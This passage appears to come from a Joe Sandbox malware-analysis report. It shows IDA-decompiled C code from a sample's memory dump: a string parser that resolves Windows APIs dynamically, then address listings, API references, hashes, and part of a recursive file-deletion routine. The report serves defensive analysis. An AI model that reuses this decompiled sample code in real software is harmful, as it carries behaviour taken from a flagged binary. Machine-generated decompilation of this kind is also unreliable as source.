				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t319 = _t246;
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c24
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040596D(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C38(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040625F(0x7a3f28, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B7C(_t68);
					} else {
						lstrcatW(0x7a3f28, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f28,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040625F(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405925(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052C3(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8ac8 =  *0x7a8ac8 + 1;
										} else {
											E004052C3(0xfffffff1, _t68);
											E00406025(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040596D(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x7a3f28 - 0x5c;
					if( *0x7a3f28 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
